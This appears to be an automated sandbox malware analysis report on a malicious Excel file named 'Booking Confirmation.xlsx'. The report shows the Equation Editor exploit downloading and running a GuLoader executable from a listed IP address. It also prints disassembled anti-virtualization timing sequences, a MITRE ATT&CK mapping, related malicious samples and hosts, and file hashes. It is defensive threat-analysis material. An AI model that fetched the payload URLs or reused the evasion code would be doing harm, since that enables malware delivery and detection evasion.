Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Booking Confirmation.xlsx

Stream path 'EncryptedPackage' entropy: 7.99865188998 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A7036	6_2_002A7036
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A100E	6_2_002A100E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A4071	6_2_002A4071
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A2958	6_2_002A2958
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A42CD	6_2_002A42CD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A1B1A	6_2_002A1B1A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A1B5F	6_2_002A1B5F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A43F1	6_2_002A43F1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A341B	6_2_002A341B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A7D52	6_2_002A7D52
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A0EFE	6_2_002A0EFE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A0FB5	6_2_002A0FB5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A6F9E	6_2_002A6F9E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A2793	6_2_002A2793

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002A01BE second address: 00000000002A01BE instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002A70C1 second address: 00000000002A70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002A8DB2 second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002A8DFF second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F03A0E2C8FFh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002A7A0D second address: 00000000002A7A0D instructions:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002A01BE second address: 00000000002A01BE instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002A70C1 second address: 00000000002A70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002A8DB2 second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002A8DFF second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F03A0E2C8FFh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002A7A0D second address: 00000000002A7A0D instructions:

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002A54E7 rdtsc

6_2_002A54E7

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2280

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002A54E7 rdtsc

6_2_002A54E7

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A50CA mov eax, dword ptr fs:[00000030h]	6_2_002A50CA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A2958 mov eax, dword ptr fs:[00000030h]	6_2_002A2958
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A71A9 mov eax, dword ptr fs:[00000030h]	6_2_002A71A9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A6B93 mov eax, dword ptr fs:[00000030h]	6_2_002A6B93
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A341B mov eax, dword ptr fs:[00000030h]	6_2_002A341B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A7D52 mov eax, dword ptr fs:[00000030h]	6_2_002A7D52

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2365906619.0000000000880000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2365906619.0000000000880000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2365906619.0000000000880000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002A2183 cpuid

6_2_002A2183

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution12	Path Interception	Process Injection12	Masquerading111	OS Credential Dumping	Security Software Discovery31	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information11	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol121	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Extra Window Memory Injection1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery313	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	7%	ReversingLabs	Win32.Trojan.Vebzenpak
C:\Users\Public\vbc.exe	7%	ReversingLabs	Win32.Trojan.Vebzenpak

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://ceattire.com/bin_UYDMbHwI28.bin	0%	Avira URL Cloud	safe
http://180.214.239.39/port/.svchost.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ceattire.com/bin_UYDMbHwI28.bin	true	Avira URL Cloud: safe	unknown
http://180.214.239.39/port/.svchost.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.day.com/dam/1.0	3E10AF3D.emf.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
180.214.239.39	unknown	Viet Nam		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	448719
Start date:	14.07.2021
Start time:	16:54:15
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Booking Confirmation.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@4/11@0/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 53% Number of executed functions: 6 Number of non-executed functions: 49
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, vga.dll Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:55:06	API Interceptor	77x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
180.214.239.39	6306093940.xlsx	Get hash	malicious	Browse	180.214.239.39/ssh/.svchost.exe
180.214.239.39	6306093940.xlsx	Get hash	malicious	Browse	180.214.239.39/mssn/.svchost.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	kung.xlsx	Get hash	malicious	Browse	103.140.250.43
	TT PAYMENT CONFIRMATION.xlsx	Get hash	malicious	Browse	103.89.90.94
	lokibot.docx	Get hash	malicious	Browse	103.133.106.144
	payment advice.exe	Get hash	malicious	Browse	103.89.91.38
	PROFORMA INVOICE.xlsx	Get hash	malicious	Browse	103.140.250.43
	INVM220210055600512.xlsx	Get hash	malicious	Browse	103.89.90.94
	xP0clPWhrv.exe	Get hash	malicious	Browse	103.133.106.117
	Doc1892071321.exe	Get hash	malicious	Browse	103.133.104.146
	http___103.89.90.94_suket_wininit.exe	Get hash	malicious	Browse	103.89.90.94
	DOC.1000000567.267805032019.doc__.rtf	Get hash	malicious	Browse	103.133.106.117
	shipping quote.xlsx	Get hash	malicious	Browse	103.140.250.43
	INVM220210055600512.xlsx	Get hash	malicious	Browse	103.89.90.94
	NEW ORDER.xlsx	Get hash	malicious	Browse	103.140.250.43
	OUTSTANDING SOA.xlsx	Get hash	malicious	Browse	103.145.253.94
	6306093940.xlsx	Get hash	malicious	Browse	180.214.239.39
	INVM220210055600512.xlsx	Get hash	malicious	Browse	103.89.90.94
	pXL06trbQ2.exe	Get hash	malicious	Browse	103.133.106.117
	DOO STILO NOVI SAD EUR 5.200,99 20210705094119.doc	Get hash	malicious	Browse	103.133.106.117
	11.xlsx	Get hash	malicious	Browse	103.140.250.43
	6306093940.xlsx	Get hash	malicious	Browse	180.214.239.39

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	267376
Entropy (8bit):	4.7769054763067915
Encrypted:	false
SSDEEP:	1536:x2M5j2eBXFScbssSe/W+dMa27qQ0Z9Dfs4IwNAvgiIOm72tNHLg/8A:T5FXrbVTeE2uQU7s49AMUrg/8A
MD5:	FCFB0EC70F1419EDE8A534CC95CB61E9
SHA1:	D3B529D77F1DE00D63A75B3956D4BCF6BBCE30CA
SHA-256:	FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
SHA-512:	FFEC36B157F889A2BD351B9D8423B247138A5FD2E57DE83BB1253336518431136A265D244B653AF470A8D04E2674C4CADF467C065A7FC38F10EFFEDD705AB248
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 7%
Reputation:	low
IE Cache URL:	http://180.214.239.39/port/.svchost.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....FR.................`..........p........p....@..........................................................................d..(........z..........X............... .......................................(... ....................................text...0Y.......`.................. ..`.data........p.......p..............@....rsrc....z..........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E7724F.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
Category:	dropped
Size (bytes):	62140
Entropy (8bit):	7.529847875703774
Encrypted:	false
SSDEEP:	1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
MD5:	722C1BE1697CFCEAE7BDEFB463265578
SHA1:	7D300A2BAB951B475477FAA308E4160C67AD93A9
SHA-256:	2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
SHA-512:	2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33A5C606.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E10AF3D.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.812180637073989
Encrypted:	false
SSDEEP:	3072:y34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:c4UcLe0JOcXuunhqcS
MD5:	AF315ACBE803E8A5729F0B6B0CA5942C
SHA1:	C21EDD8E79667300365573DF36DBEAD853977E9C
SHA-256:	013B5B9200F01398565C59B4F815AF21F513FF7DC696787C8D838A510A101199
SHA-512:	F3F6E76076AB29217315D2EC0E3E2F976290282F2F7F2FE6B6B4ED18363221E829882C306A01C75C4C81684884DF8F195869A889A83A12C13447F9A505A69FED
Malicious:	false
Reputation:	low
Preview:	....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................P$...../..f.P.@U.%...../.../.....L./.../.RQ.RL./.D./......./.0./.$Q.RL./.D./. ...Id.PD./.L./. ............d.P........................................%...X...%...7...................{$..................C.a.l.i.b.r.i............./.X...D./.x./..8.P........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87034804.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	94963
Entropy (8bit):	7.9700481154985985
Encrypted:	false
SSDEEP:	1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
MD5:	17EC925977BED2836071429D7B476809
SHA1:	7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
SHA-256:	83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
SHA-512:	3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
Malicious:	false
Preview:	.PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.\|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89452338.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
Category:	dropped
Size (bytes):	62140
Entropy (8bit):	7.529847875703774
Encrypted:	false
SSDEEP:	1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
MD5:	722C1BE1697CFCEAE7BDEFB463265578
SHA1:	7D300A2BAB951B475477FAA308E4160C67AD93A9
SHA-256:	2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
SHA-512:	2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
Malicious:	false
Preview:	......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C86F0153.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E9A0341A.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7592
Entropy (8bit):	5.4446939747299385
Encrypted:	false
SSDEEP:	96:znUgcqHOvlJaX1/0q7r097v47LqLw1KG37oV9oaUd+dSOPUe1jc:bU/vTVgaL0K79oaUd+dQe1jc
MD5:	90E7CF2722D8B0130292A0D91E15C2DF
SHA1:	B2FBF1814AC8BBEED7A6F3074703BA34B392F107
SHA-256:	ED43E23E4285C0EFBA4F46C6227BDDF4FD3C4DD758DD1280A6D8D5C21BD7E210
SHA-512:	D280C16F0287FC2CC94CD9D08C7DDE11B24A14E720B910590A10445B1CC8FC0D57C323BBF1D5F9E9238E08135FD1609B8BF7094B7B408E4F82053C9F7C630AE6
Malicious:	false
Preview:	....l...(.......e...<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.......d.........................'.q....\.............L..W.q........6.v_.q......q ...Dy.wx.................w....$.......d..........J^.q.... ^.q...x...@.......-...4...<.w................<..v.Zkv....X..o.... .........................lvdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F50319D9.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	94963
Entropy (8bit):	7.9700481154985985
Encrypted:	false
SSDEEP:	1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
MD5:	17EC925977BED2836071429D7B476809
SHA1:	7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
SHA-256:	83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
SHA-512:	3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
Malicious:	false
